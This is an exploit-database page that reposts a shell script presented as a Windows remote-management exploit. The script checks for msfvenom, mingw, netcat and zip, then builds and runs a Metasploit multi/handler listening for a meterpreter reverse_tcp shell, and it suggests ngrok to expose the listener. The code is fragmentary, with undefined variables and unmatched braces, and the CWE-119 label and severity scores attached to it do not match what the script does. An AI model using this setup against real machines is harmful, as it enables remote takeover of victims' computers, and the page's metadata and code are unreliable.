Advertisement






Windows x32-x64 MSFVenom TCP/80-4444 Remote Management Exploit

CVE Category Price Severity
CWE-119: Improper Restriction of Operations within the Bounds of a Memory Buffer Not Specified High
Author Risk Exploitation Type Date
Not Specified High Remote 2020-06-21
CVSS EPSS EPSSP
CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N 0.9214 0.5579

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020060090

Below is a copy:

Windows x32-x64 MSFVenom TCP/80-4444 Remote Management Exploit
#Author : Gaddar
#Team : SiyahBayrak Turkish Vulnerability Researchers
#Video : https://youtu.be/oPBI0ELz44g
#Note : I used the CatchYou software in the video. It can also be exploited without software.
#Tested on Kali Linux 2020.2
#Payload Tested on Win10 x64 and Win7 x64
#Instagram : @pt.php

Exp;

command -v msfvenom > /dev/null 2>&1 || { echo >&2 ;exit 1; }
command -v i686-w64-mingw32-gcc > /dev/null 2>&1 || { echo >&2; 
exit 1; }
command -v base64 > /dev/null 2>&1 || { echo >&2; exit 1; }
command -v zip > /dev/null 2>&1 || { echo >&2; exit 1; }
command -v netcat > /dev/null 2>&1 || { echo >&2; exit 1; } 

Requirements;
Ngrok or other dns services. (https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-arm.zip) - For amd64
Netcat : "nc [options] 127.0.0.1 4444"

Metasploit Framework;

default_listr="Y"
read -p $'\n\e[1;33m[\e[0m\e[1;77m+\e[0m\e[1;33m] Start Metasploit Listener? \e[0m\e[1;77m[Y/n]\e[0m\e[1;33m: \e[0m' listr
listr="${listr:-${default_listr}}"
if [[ $listr == Y || $listr == y || $listr == Yes || $listr == yes ]]; then
printf "use exploit/multi/handler\n" > handler.rc
printf "set payload %s\n" $payload_msf >> handler.rc
if [[ $forward == true ]];then
printf "set LHOST 127.0.0.1\n" >> handler.rc
else
printf "set LHOST %s\n" $server_tcp >> handler.rc
fi
printf "set LPORT %s\n" $server_port >> handler.rc
#printf "set ExitOnSession false\n" >> handler.rc
#printf "exploit -j -z\n" >> handler.rc
printf "exploit\n" >> handler.rc
msfconsole -r handler.rc
rm -rf handler.rc
fi
fi
}

Note : Handler.rc on CatchYou

Handler.rc;
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp [default]
set LHOST 127.0.0.1
set LPORT 4444
exploit

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.